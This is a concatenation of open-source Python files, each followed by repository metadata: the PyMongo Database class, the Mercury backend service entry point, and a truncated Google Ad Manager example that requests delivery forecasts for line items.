return [manipulator.__class__.__name__
for manipulator in self.__outgoing_copying_manipulators]
def __eq__(self, other):
if isinstance(other, Database):
us = (self.__connection, self.__name)
them = (other.__connection, other.__name)
return us == them
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "Database(%r, %r)" % (self.__connection, self.__name)
def __getattr__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
return Collection(self, name)
def __getitem__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
return self.__getattr__(name)
def create_collection(self, name, **kwargs):
"""Create a new :class:`~pymongo.collection.Collection` in this
database.
Normally collection creation is automatic. This method should
only be used to specify options on
creation. :class:`~pymongo.errors.CollectionInvalid` will be
raised if the collection already exists.
Options should be passed as keyword arguments to this method. Supported
options vary with MongoDB release. Some examples include:
- "size": desired initial size for the collection (in
bytes). For capped collections this size is the max
size of the collection.
- "capped": if True, this is a capped collection
- "max": maximum number of objects if capped (optional)
See the MongoDB documentation for a full list of supported options by
server version.
:Parameters:
- `name`: the name of the collection to create
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionchanged:: 1.5
deprecating `options` in favor of kwargs
"""
opts = {"create": True}
opts.update(kwargs)
if name in self.collection_names():
raise CollectionInvalid("collection %s already exists" % name)
return Collection(self, name, **opts)
def _apply_incoming_manipulators(self, son, collection):
for manipulator in self.__incoming_manipulators:
son = manipulator.transform_incoming(son, collection)
return son
def _apply_incoming_copying_manipulators(self, son, collection):
for manipulator in self.__incoming_copying_manipulators:
son = manipulator.transform_incoming(son, collection)
return son
def _fix_incoming(self, son, collection):
"""Apply manipulators to an incoming SON object before it gets stored.
:Parameters:
- `son`: the son object going into the database
- `collection`: the collection the son object is being saved in
"""
son = self._apply_incoming_manipulators(son, collection)
son = self._apply_incoming_copying_manipulators(son, collection)
return son
def _fix_outgoing(self, son, collection):
"""Apply manipulators to a SON object as it comes out of the database.
:Parameters:
- `son`: the son object coming out of the database
- `collection`: the collection the son object was saved in
"""
for manipulator in reversed(self.__outgoing_manipulators):
son = manipulator.transform_outgoing(son, collection)
for manipulator in reversed(self.__outgoing_copying_manipulators):
son = manipulator.transform_outgoing(son, collection)
return son
def _command(self, command, value=1,
check=True, allowable_errors=None,
uuid_subtype=OLD_UUID_SUBTYPE, compile_re=True, **kwargs):
"""Internal command helper.
"""
if isinstance(command, str):
command = SON([(command, value)])
command_name = list(command.keys())[0].lower()
must_use_master = kwargs.pop('_use_master', False)
if command_name not in secondary_ok_commands:
must_use_master = True
# Special-case: mapreduce can go to secondaries only if inline
if command_name == 'mapreduce':
out = command.get('out') or kwargs.get('out')
if not isinstance(out, dict) or not out.get('inline'):
must_use_master = True
# Special-case: aggregate with $out cannot go to secondaries.
if command_name == 'aggregate':
for stage in kwargs.get('pipeline', []):
if '$out' in stage:
must_use_master = True
break
extra_opts = {
'as_class': kwargs.pop('as_class', None),
'slave_okay': kwargs.pop('slave_okay', self.slave_okay),
'_must_use_master': must_use_master,
'_uuid_subtype': uuid_subtype
}
extra_opts['read_preference'] = kwargs.pop(
'read_preference',
self.read_preference)
extra_opts['tag_sets'] = kwargs.pop(
'tag_sets',
self.tag_sets)
extra_opts['secondary_acceptable_latency_ms'] = kwargs.pop(
'secondary_acceptable_latency_ms',
self.secondary_acceptable_latency_ms)
extra_opts['compile_re'] = compile_re
fields = kwargs.get('fields')
if fields is not None and not isinstance(fields, dict):
kwargs['fields'] = helpers._fields_list_to_dict(fields)
command.update(kwargs)
# Warn if must_use_master will override read_preference.
if (extra_opts['read_preference'] != ReadPreference.PRIMARY and
extra_opts['_must_use_master']):
warnings.warn("%s does not support %s read preference "
"and will be routed to the primary instead." %
(command_name,
modes[extra_opts['read_preference']]),
UserWarning, stacklevel=3)
cursor = self["$cmd"].find(command, **extra_opts).limit(-1)
for doc in cursor:
result = doc
if check:
msg = "command %s on namespace %s failed: %%s" % (
repr(command).replace("%", "%%"), self.name + '.$cmd')
helpers._check_command_response(result, self.connection.disconnect,
msg, allowable_errors)
return result, cursor.conn_id
def command(self, command, value=1,
check=True, allowable_errors=[],
uuid_subtype=OLD_UUID_SUBTYPE, compile_re=True, **kwargs):
"""Issue a MongoDB command.
Send command `command` to the database and return the
response. If `command` is an instance of :class:`basestring`
(:class:`str` in python 3) then the command {`command`: `value`}
will be sent. Otherwise, `command` must be an instance of
:class:`dict` and will be sent as is.
Any additional keyword arguments will be added to the final
command document before it is sent.
For example, a command like ``{buildinfo: 1}`` can be sent
using:
>>> db.command("buildinfo")
For a command where the value matters, like ``{collstats:
collection_name}`` we can do:
>>> db.command("collstats", collection_name)
For commands that take additional arguments we can use
kwargs. So ``{filemd5: object_id, root: file_root}`` becomes:
>>> db.command("filemd5", object_id, root=file_root)
:Parameters:
- `command`: document representing the command to be issued,
or the name of the command (for simple commands only).
.. note:: the order of keys in the `command` document is
significant (the "verb" must come first), so commands
which require multiple keys (e.g. `findandmodify`)
should use an instance of :class:`~bson.son.SON` or
a string and kwargs instead of a Python `dict`.
- `value` (optional): value to use for the command verb when
`command` is passed as a string
- `check` (optional): check the response for errors, raising
:class:`~pymongo.errors.OperationFailure` if there are any
- `allowable_errors`: if `check` is ``True``, error messages
in this list will be ignored by error-checking
- `uuid_subtype` (optional): The BSON binary subtype to use
for a UUID used in this command.
- `compile_re` (optional): if ``False``, don't attempt to compile
BSON regular expressions into Python regular expressions. Return
instances of :class:`~bson.regex.Regex` instead. Can avoid
:exc:`~bson.errors.InvalidBSON` errors when receiving
Python-incompatible regular expressions, for example from
``currentOp``
- `read_preference`: The read preference for this connection.
See :class:`~pymongo.read_preferences.ReadPreference` for available
options.
- `tag_sets`: Read from replica-set members with these tags.
To specify a priority-order for tag sets, provide a list of
tag sets: ``[{'dc': 'ny'}, {'dc': 'la'}, {}]``. A final, empty tag
set, ``{}``, means "read from any member that matches the mode,
ignoring tags." ReplicaSetConnection tries each set of tags in turn
until it finds a set of tags with at least one matching member.
- `secondary_acceptable_latency_ms`: Any replica-set member whose
ping time is within secondary_acceptable_latency_ms of the nearest
member may accept reads. Default 15 milliseconds.
**Ignored by mongos** and must be configured on the command line.
See the localThreshold_ option for more information.
- `**kwargs` (optional): additional keyword arguments will
be added to the command document before it is sent
.. note:: ``command`` ignores the ``network_timeout`` parameter.
.. versionchanged:: 2.7
Added ``compile_re`` option.
.. versionchanged:: 2.3
Added `tag_sets` and `secondary_acceptable_latency_ms` options.
.. versionchanged:: 2.2
Added support for `as_class` - the class you want to use for
the resulting documents
.. versionchanged:: 1.6
Added the `value` argument for string commands, and keyword
arguments for additional command options.
.. versionchanged:: 1.5
`command` can be a string in addition to a full document.
.. versionadded:: 1.4
.. mongodoc:: commands
.. _localThreshold: http://docs.mongodb.org/manual/reference/mongos/#cmdoption-mongos--localThreshold
"""
return self._command(command, value, check, allowable_errors,
uuid_subtype, compile_re, **kwargs)[0]
def collection_names(self, include_system_collections=True):
"""Get a list of all the collection names in this database.
:Parameters:
- `include_system_collections` (optional): if ``False`` list
will not include system collections (e.g ``system.indexes``)
"""
client = self.connection
client._ensure_connected(True)
if client.max_wire_version > 2:
res, addr = self._command("listCollections",
cursor={},
read_preference=ReadPreference.PRIMARY)
# MongoDB 2.8rc2
if "collections" in res:
results = res["collections"]
# >= MongoDB 2.8rc3
else:
results = CommandCursor(self["$cmd"], res["cursor"], addr)
names = [result["name"] for result in results]
else:
names = [result["name"] for result
in self["system.namespaces"].find(_must_use_master=True)]
names = [n[len(self.__name) + 1:] for n in names
if n.startswith(self.__name + ".") and "$" not in n]
if not include_system_collections:
names = [n for n in names if not n.startswith("system.")]
return names
def drop_collection(self, name_or_collection):
"""Drop a collection.
:Parameters:
- `name_or_collection`: the name of a collection to drop or the
collection object itself
"""
name = name_or_collection
if isinstance(name, Collection):
name = name.name
if not isinstance(name, str):
raise TypeError("name_or_collection must be an instance of "
"%s or Collection" % (str.__name__,))
self.__connection._purge_index(self.__name, name)
self.command("drop", str(name), allowable_errors=["ns not found"],
read_preference=ReadPreference.PRIMARY)
def validate_collection(self, name_or_collection,
scandata=False, full=False):
"""Validate a collection.
Returns a dict of validation info. Raises CollectionInvalid if
validation fails.
With MongoDB < 1.9 the result dict will include a `result` key
with a string value that represents the validation results. With
MongoDB >= 1.9 the `result` key no longer exists and the results
are split into individual fields in the result dict.
:Parameters:
- `name_or_collection`: A Collection object or the name of a
collection to validate.
- `scandata`: Do extra checks beyond checking the overall
structure of the collection.
- `full`: Have the server do a more thorough scan of the
collection. Use with `scandata` for a thorough scan
of the structure of the collection and the individual
documents. Ignored in MongoDB versions before 1.9.
.. versionchanged:: 1.11
validate_collection previously returned a string.
.. versionadded:: 1.11
Added `scandata` and `full` options.
"""
name = name_or_collection
if isinstance(name, Collection):
name = name.name
if not isinstance(name, str):
raise TypeError("name_or_collection must be an instance of "
"%s or Collection" % (str.__name__,))
result = self.command("validate", str(name),
scandata=scandata, full=full,
read_preference=ReadPreference.PRIMARY)
valid = True
# Pre 1.9 results
if "result" in result:
info = result["result"]
if info.find("exception") != -1 or info.find("corrupt") != -1:
raise CollectionInvalid("%s invalid: %s" % (name, info))
# Sharded results
elif "raw" in result:
for _, res in result["raw"].items():
if "result" in res:
info = res["result"]
if (info.find("exception") != -1 or
info.find("corrupt") != -1):
raise CollectionInvalid("%s invalid: "
"%s" % (name, info))
elif not res.get("valid", False):
valid = False
break
# Post 1.9 non-sharded results.
elif not result.get("valid", False):
valid = False
if not valid:
raise CollectionInvalid("%s invalid: %r" % (name, result))
return result
def current_op(self, include_all=False):
"""Get information on operations currently running.
:Parameters:
- `include_all` (optional): if ``True`` also list currently
idle operations in the result
"""
if include_all:
return self['$cmd.sys.inprog'].find_one({"$all": True})
else:
return self['$cmd.sys.inprog'].find_one()
def profiling_level(self):
"""Get the database's current profiling level.
Returns one of (:data:`~pymongo.OFF`,
:data:`~pymongo.SLOW_ONLY`, :data:`~pymongo.ALL`).
.. mongodoc:: profiling
"""
result = self.command("profile", -1,
read_preference=ReadPreference.PRIMARY)
assert result["was"] >= 0 and result["was"] <= 2
return result["was"]
def set_profiling_level(self, level, slow_ms=None):
"""Set the database's profiling level.
:Parameters:
- `level`: Specifies a profiling level, see list of possible values
below.
- `slow_ms`: Optionally modify the threshold for the profile to
consider a query or operation. Even if the profiler is off queries
slower than the `slow_ms` level will get written to the logs.
Possible `level` values:
+----------------------------+------------------------------------+
| Level | Setting |
+============================+====================================+
| :data:`~pymongo.OFF` | Off. No profiling. |
+----------------------------+------------------------------------+
| :data:`~pymongo.SLOW_ONLY` | On. Only includes slow operations. |
+----------------------------+------------------------------------+
| :data:`~pymongo.ALL` | On. Includes all operations. |
+----------------------------+------------------------------------+
Raises :class:`ValueError` if level is not one of
(:data:`~pymongo.OFF`, :data:`~pymongo.SLOW_ONLY`,
:data:`~pymongo.ALL`).
.. mongodoc:: profiling
"""
if not isinstance(level, int) or level < 0 or level > 2:
raise ValueError("level must be one of (OFF, SLOW_ONLY, ALL)")
if slow_ms is not None and not isinstance(slow_ms, int):
raise TypeError("slow_ms must be an integer")
if slow_ms is not None:
self.command("profile", level, slowms=slow_ms,
read_preference=ReadPreference.PRIMARY)
else:
self.command("profile", level,
read_preference=ReadPreference.PRIMARY)
def profiling_info(self):
"""Returns a list containing current profiling information.
.. mongodoc:: profiling
"""
return list(self["system.profile"].find())
def error(self):
"""**DEPRECATED**: Get the error if one occurred on the last operation.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0.
Return None if the last operation was error-free. Otherwise return the
error that occurred.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("Database.error() is deprecated",
DeprecationWarning, stacklevel=2)
error = self.command("getlasterror",
read_preference=ReadPreference.PRIMARY)
error_msg = error.get("err", "")
if error_msg is None:
return None
if error_msg.startswith("not master"):
self.__connection.disconnect()
return error
def last_status(self):
"""**DEPRECATED**: Get status information from the last operation.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0.
Returns a SON object with status information.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("last_status() is deprecated",
DeprecationWarning, stacklevel=2)
return self.command("getlasterror",
read_preference=ReadPreference.PRIMARY)
def previous_error(self):
"""**DEPRECATED**: Get the most recent error on this database.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0. Furthermore, the underlying database command
``getpreverror`` will be removed in a future MongoDB release.
Only returns errors that have occurred since the last call to
:meth:`reset_error_history`. Returns None if no such errors have
occurred.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("previous_error() is deprecated",
DeprecationWarning, stacklevel=2)
error = self.command("getpreverror",
read_preference=ReadPreference.PRIMARY)
if error.get("err", 0) is None:
return None
return error
def reset_error_history(self):
"""**DEPRECATED**: Reset the error history of this database.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0. Furthermore, the underlying database command
``reseterror`` will be removed in a future MongoDB release.
Calls to :meth:`previous_error` will only return errors that have
occurred since the most recent call to this method.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("reset_error_history() is deprecated",
DeprecationWarning, stacklevel=2)
self.command("reseterror",
read_preference=ReadPreference.PRIMARY)
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Database' object is not iterable")
def _default_role(self, read_only):
if self.name == "admin":
if read_only:
return "readAnyDatabase"
else:
return "root"
else:
if read_only:
return "read"
else:
return "dbOwner"
def _create_or_update_user(
self, create, name, password, read_only, **kwargs):
"""Use a command to create (if create=True) or modify a user.
"""
opts = {}
if read_only or (create and "roles" not in kwargs):
warnings.warn("Creating a user with the read_only option "
"or without roles is deprecated in MongoDB "
">= 2.6", DeprecationWarning)
opts["roles"] = [self._default_role(read_only)]
elif read_only:
warnings.warn("The read_only option is deprecated in MongoDB "
">= 2.6, use 'roles' instead", DeprecationWarning)
if password is not None:
# We always salt and hash client side.
if "digestPassword" in kwargs:
raise ConfigurationError("The digestPassword option is not "
"supported via add_user. Please use "
"db.command('createUser', ...) "
"instead for this option.")
opts["pwd"] = auth._password_digest(name, password)
opts["digestPassword"] = False
opts["writeConcern"] = self._get_wc_override() or self.write_concern
opts.update(kwargs)
if create:
command_name = "createUser"
else:
command_name = "updateUser"
self.command(command_name, name,
read_preference=ReadPreference.PRIMARY, **opts)
def _legacy_add_user(self, name, password, read_only, **kwargs):
"""Uses v1 system to add users, i.e. saving to system.users.
"""
user = self.system.users.find_one({"user": name}) or {"user": name}
if password is not None:
user["pwd"] = auth._password_digest(name, password)
if read_only is not None:
user["readOnly"] = read_only
user.update(kwargs)
try:
self.system.users.save(user, **self._get_wc_override())
except OperationFailure as exc:
# First admin user add fails gle in MongoDB >= 2.1.2
# See SERVER-4225 for more information.
if 'login' in str(exc):
pass
# First admin user add fails gle from mongos 2.0.x
# and 2.2.x.
elif (exc.details and
'getlasterror' in exc.details.get('note', '')):
pass
else:
raise
def add_user(self, name, password=None, read_only=None, **kwargs):
"""Create user `name` with password `password`.
Add a new user with permissions for this :class:`Database`.
.. note:: Will change the password if user `name` already exists.
:Parameters:
- `name`: the name of the user to create
- `password` (optional): the password of the user to create. Can not
be used with the ``userSource`` argument.
- `read_only` (optional): if ``True`` the user will be read only
- `**kwargs` (optional): optional fields for the user document
(e.g. ``userSource``, ``otherDBRoles``, or ``roles``). See
`<http://docs.mongodb.org/manual/reference/privilege-documents>`_
for more information.
.. note:: The use of optional keyword arguments like ``userSource``,
``otherDBRoles``, or ``roles`` requires MongoDB >= 2.4.0
.. versionchanged:: 2.5
Added kwargs support for optional fields introduced in MongoDB 2.4
.. versionchanged:: 2.2
Added support for read only users
.. versionadded:: 1.4
"""
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if password is not None:
if not isinstance(password, str):
raise TypeError("password must be an instance "
"of %s or None" % (str.__name__,))
if len(password) == 0:
raise ValueError("password can't be empty")
if read_only is not None:
read_only = common.validate_boolean('read_only', read_only)
if 'roles' in kwargs:
raise ConfigurationError("Can not use "
"read_only and roles together")
try:
uinfo = self.command("usersInfo", name,
read_preference=ReadPreference.PRIMARY)
self._create_or_update_user(
(not uinfo["users"]), name, password, read_only, **kwargs)
except OperationFailure as exc:
# MongoDB >= 2.5.3 requires the use of commands to manage
# users.
if exc.code in common.COMMAND_NOT_FOUND_CODES:
self._legacy_add_user(name, password, read_only, **kwargs)
# Unauthorized. MongoDB >= 2.7.1 has a narrow localhost exception,
# and we must add a user before sending commands.
elif exc.code == 13:
self._create_or_update_user(
True, name, password, read_only, **kwargs)
else:
raise
def remove_user(self, name):
"""Remove user `name` from this :class:`Database`.
User `name` will no longer have permissions to access this
:class:`Database`.
:Parameters:
- `name`: the name of the user to remove
.. versionadded:: 1.4
"""
try:
write_concern = self._get_wc_override() or self.write_concern
self.command("dropUser", name,
read_preference=ReadPreference.PRIMARY,
writeConcern=write_concern)
except OperationFailure as exc:
# See comment in add_user try / except above.
if exc.code in common.COMMAND_NOT_FOUND_CODES:
self.system.users.remove({"user": name},
**self._get_wc_override())
return
raise
def authenticate(self, name, password=None,
source=None, mechanism='DEFAULT', **kwargs):
"""Authenticate to use this database.
Authentication lasts for the life of the underlying client
instance, or until :meth:`logout` is called.
Raises :class:`TypeError` if (required) `name`, (optional) `password`,
or (optional) `source` is not an instance of :class:`basestring`
(:class:`str` in python 3).
.. note::
- This method authenticates the current connection, and
will also cause all new :class:`~socket.socket` connections
in the underlying client instance to be authenticated automatically.
- Authenticating more than once on the same database with different
credentials is not supported. You must call :meth:`logout` before
authenticating with new credentials.
- When sharing a client instance between multiple threads, all
threads will share the authentication. If you need different
authentication profiles for different purposes you must use
distinct client instances.
- To get authentication to apply immediately to all
existing sockets you may need to reset this client instance's
sockets using :meth:`~pymongo.mongo_client.MongoClient.disconnect`.
:Parameters:
- `name`: the name of the user to authenticate.
- `password` (optional): the password of the user to authenticate.
Not used with GSSAPI or MONGODB-X509 authentication.
- `source` (optional): the database to authenticate on. If not
specified the current database is used.
- `mechanism` (optional): See
:data:`~pymongo.auth.MECHANISMS` for options.
By default, use SCRAM-SHA-1 with MongoDB 3.0 and later,
MONGODB-CR (MongoDB Challenge Response protocol) for older servers.
- `gssapiServiceName` (optional): Used with the GSSAPI mechanism
to specify the service name portion of the service principal name.
Defaults to 'mongodb'.
.. versionadded:: 2.8
Use SCRAM-SHA-1 with MongoDB 3.0 and later.
.. versionchanged:: 2.5
Added the `source` and `mechanism` parameters. :meth:`authenticate`
now raises a subclass of :class:`~pymongo.errors.PyMongoError` if
authentication fails due to invalid credentials or configuration
issues.
.. mongodoc:: authenticate
"""
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if password is not None and not isinstance(password, str):
raise TypeError("password must be an instance "
"of %s" % (str.__name__,))
if source is not None and not isinstance(source, str):
raise TypeError("source must be an instance "
"of %s" % (str.__name__,))
common.validate_auth_mechanism('mechanism', mechanism)
validated_options = {}
for option, value in kwargs.items():
normalized, val = common.validate_auth_option(option, value)
validated_options[normalized] = val
credentials = auth._build_credentials_tuple(mechanism,
source or self.name, name,
password, validated_options)
self.connection._cache_credentials(self.name, credentials)
return True
def logout(self):
"""Deauthorize use of this database for this client instance.
.. note:: Other databases may still be authenticated, and other
existing :class:`~socket.socket` connections may remain
authenticated for this database unless you reset all sockets
with :meth:`~pymongo.mongo_client.MongoClient.disconnect`.
"""
# Sockets will be deauthenticated as they are used.
self.connection._purge_credentials(self.name)
def dereference(self, dbref, **kwargs):
"""Dereference a :class:`~bson.dbref.DBRef`, getting the
document it points to.
Raises :class:`TypeError` if `dbref` is not an instance of
:class:`~bson.dbref.DBRef`. Returns a document, or ``None`` if
the reference does not point to a valid document. Raises
:class:`ValueError` if `dbref` has a database specified that
is different from the current database.
:Parameters:
- `dbref`: the reference
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to
:meth:`~pymongo.collection.Collection.find`.
"""
if not isinstance(dbref, DBRef):
raise TypeError("cannot dereference a %s" % type(dbref))
if dbref.database is not None and dbref.database != self.__name:
raise ValueError("trying to dereference a DBRef that points to "
"another database (%r not %r)" % (dbref.database,
self.__name))
return self[dbref.collection].find_one({"_id": dbref.id}, **kwargs)
def eval(self, code, *args):
"""Evaluate a JavaScript expression in MongoDB.
Useful if you need to touch a lot of data lightly; in such a
scenario the network transfer of the data could be a
bottleneck. The `code` argument must be a JavaScript
function. Additional positional arguments will be passed to
that function when it is run on the server.
Raises :class:`TypeError` if `code` is not an instance of
:class:`basestring` (:class:`str` in python 3) or `Code`.
Raises :class:`~pymongo.errors.OperationFailure` if the eval
fails. Returns the result of the evaluation.
:Parameters:
- `code`: string representation of JavaScript code to be
evaluated
- `args` (optional): additional positional arguments are
passed to the `code` being evaluated
"""
if not isinstance(code, Code):
code = Code(code)
result = self.command("$eval", code,
read_preference=ReadPreference.PRIMARY,
args=args)
return result.get("retval", None)
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
raise TypeError("'Database' object is not callable. If you meant to "
"call the '%s' method on a '%s' object it is "
"failing because no such method exists." % (
self.__name, self.__connection.__class__.__name__))
class SystemJS(object):
"""Helper class for dealing with stored JavaScript.
"""
def __init__(self, database):
"""Get a system js helper for the database `database`.
An instance of :class:`SystemJS` can be created with an instance
of :class:`Database` through :attr:`Database.system_js`,
manual instantiation of this class should not be necessary.
:class:`SystemJS` instances allow for easy manipulation and
access to server-side JavaScript:
.. doctest::
>>> db.system_js.add1 = "function (x) { return x + 1; }"
>>> db.system.js.find({"_id": "add1"}).count()
1
>>> db.system_js.add1(5)
6.0
>>> del db.system_js.add1
>>> db.system.js.find({"_id": "add1"}).count()
0
.. note:: Requires server version **>= 1.1.1**
.. versionadded:: 1.5
"""
# can't just assign it since we've overridden __setattr__
object.__setattr__(self, "_db", database)
def __setattr__(self, name, code):
self._db.system.js.save({"_id": name, "value": Code(code)},
**self._db._get_wc_override())
def __setitem__(self, name, code):
self.__setattr__(name, code)
def __delattr__(self, name):
self._db.system.js.remove({"_id": name}, **self._db._get_wc_override())
def __delitem__(self, name):
self.__delattr__(name)
def __getattr__(self, name):
return lambda *args: self._db.eval(Code("function() { "
"return this[name].apply("
"this, arguments); }",
scope={'name': name}), *args)
def __getitem__(self, name):
return self.__getattr__(name)
def list(self):
"""Get a list of the names of the functions stored in this database.
.. versionadded:: 1.9
"""
return [x["_id"] for x in self._db.system.js.find(fields=["_id"])]
|
mit
| -8,870,270,720,626,688,000
| 39.114209
| 109
| 0.571749
| false
| 4.678729
| false
| false
| false
|
jr0d/mercury
|
src/mercury/backend/service.py
|
1
|
7176
|
# Copyright 2015 Jared Rodriguez (jared.rodriguez@rackspace.com)
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import logging
import zmq
import zmq.asyncio
from mercury.common.asyncio.dispatcher import AsyncDispatcher
from mercury.common.asyncio.transport import TrivialAsyncRouterReqService
from mercury.common.asyncio.clients.inventory import \
InventoryClient as AsyncInventoryClient
from mercury.common.clients.inventory import InventoryClient
from mercury.backend.active_asyncio import add_active_record, ping_loop, \
stop_ping
from mercury.backend.controller import BackendController
from mercury.backend.options import parse_options
from mercury.backend.rpc_client import AsyncRPCClient
log = logging.getLogger(__name__)
class BackEndService(TrivialAsyncRouterReqService):
def __init__(self,
bind_address,
inventory_client,
rpc_client,
name,
datacenter,
vip,
port):
super(BackEndService, self).__init__(bind_address)
self.inventory_client = inventory_client
self.rpc_client = rpc_client
self.server_info = {
'name': name,
'datacenter': datacenter,
'address': vip,
'port': port
}
self.controller = BackendController(self.server_info,
self.inventory_client,
self.rpc_client)
self.dispatcher = AsyncDispatcher(self.controller)
async def process(self, message):
""" Process the message via dispatcher """
return await self.dispatcher.dispatch(message)
def reacquire(inventory_url, backend_name):
"""
:param inventory_url:
:param backend_name:
:return:
"""
# Onetime use synchronous client
log.info('Attempting to reacquire active agents')
log.debug('Inventory Router: {}'.format(inventory_url))
inventory_client = InventoryClient(inventory_url,
# TODO: Add these to configuration
response_timeout=60,
rcv_retry=10)
existing_documents = inventory_client.query({'active': {'$ne': None},
'origin.name': backend_name},
projection={'mercury_id': 1,
'active': 1})
if existing_documents.get('error'): # Transport Error
log.error('[BACKEND CRITICAL] '
'Error communicating with inventory service, could not '
'reacquire: <{}>'.format(existing_documents.get('message')))
# Return without reacquiring any nodes. Once communication is
# reestablished, agents will begin to re-register
return
for doc in existing_documents['message']['items']:
if not BackendController.validate_agent_info(doc['active']):
log.error('Found junk in document {} expunging'.format(
doc['mercury_id']))
inventory_client.update_one(doc['mercury_id'], {'active': None})
log.info('Attempting to reacquire %s : %s' % (
doc['mercury_id'], doc['active']['rpc_address']))
add_active_record(doc)
log.info('Reacquire operation complete')
inventory_client.close()
def configure_logging(config):
""" Configure logging for application
:param config: A namespace provided from MercuryConfiguration.parse_args
"""
logging.basicConfig(level=logging.getLevelName(config.logging.level),
format=config.logging.format)
if config.subtask_debug:
logging.getLogger('mercury.rpc.ping').setLevel(logging.DEBUG)
logging.getLogger('mercury.rpc.ping2').setLevel(logging.DEBUG)
logging.getLogger('mercury.rpc.jobs.monitor').setLevel(logging.DEBUG)
if config.asyncio_debug:
logging.getLogger('mercury.rpc.active_asyncio').setLevel(logging.DEBUG)
def main():
""" Entry point """
config = parse_options()
configure_logging(config)
# Create the event loop
loop = zmq.asyncio.ZMQEventLoop()
# If config.asyncio_debug == True, enable debug
loop.set_debug(config.asyncio_debug)
# Set the zmq event loop as the default event loop
asyncio.set_event_loop(loop)
# Create Async Clients
inventory_client = AsyncInventoryClient(config.backend.inventory_router,
linger=0,
response_timeout=10,
rcv_retry=3)
rpc_client = AsyncRPCClient(config.backend.rpc_router,
linger=0,
response_timeout=10,
rcv_retry=3)
# Create a backend instance
server = BackEndService(config.backend.agent_service.bind_address,
inventory_client,
rpc_client,
config.backend.origin.name,
config.backend.origin.datacenter,
config.backend.origin.queue_service_vip,
config.backend.origin.queue_service_port)
reacquire(config.backend.inventory_router, config.backend.origin.name)
# Inject ping loop
asyncio.ensure_future(ping_loop(
ctx=server.context,
ping_interval=config.backend.ping.interval,
cycle_time=config.backend.ping.cycle_time,
initial_ping_timeout=config.backend.ping.initial_timeout,
ping_retries=config.backend.ping.retries,
backoff=config.backend.ping.backoff,
max_to_schedule=config.backend.ping.max_to_schedule,
loop=loop,
inventory_router_url=config.backend.inventory_router,
rpc_client=rpc_client),
loop=loop)
log.info('Starting Mercury Backend Service')
try:
loop.run_until_complete(server.start())
except KeyboardInterrupt:
# TODO: Add generic backend TERM handler
log.info('Sending kill signals')
stop_ping()
server.kill()
finally:
pending = asyncio.Task.all_tasks(loop=loop)
log.debug('Waiting on {} pending tasks'.format(len(pending)))
loop.run_until_complete(asyncio.gather(*pending))
log.debug('Shutting down event loop')
loop.close()
if __name__ == '__main__':
main()
|
apache-2.0
| 5,274,209,554,630,983,000
| 36.181347
| 79
| 0.603122
| false
| 4.462687
| true
| false
| false
|
googleads/googleads-python-lib
|
examples/ad_manager/v202105/forecast_service/get_delivery_forecast_for_line_items.py
|
1
|
1934
|
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets a delivery forecast for two existing line items.
To determine which line items exist, run get_all_line_items.py.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the line items to get forecasts for.
LINE_ITEM_ID_1 = 'INSERT_LINE_ITEM_1_ID_HERE'
LINE_ITEM_ID_2 = 'INSERT_LINE_ITEM_2_ID_HERE'
def main(client, line_item_id1, line_item_id2):
# Initialize appropriate service.
forecast_service = client.GetService('ForecastService', version='v202105')
# Get forecast for line item.
forecast = forecast_service.getDeliveryForecastByIds(
[line_item_id1, line_item_id2], {'ignoredLineItemIds': []})
for single_forecast in forecast['lineItemDeliveryForecasts']:
unit_type = single_forecast['unitType']
print('Forecast for line item %d:\n\t%d %s matched\n\t%d %s delivered\n\t'
'%d %s predicted\n' % (
single_forecast['lineItemId'], single_forecast['matchedUnits'],
unit_type, single_forecast['deliveredUnits'], unit_type,
single_forecast['predictedDeliveryUnits'], unit_type))
if __name__ == '__main__':
# Initialize client object.
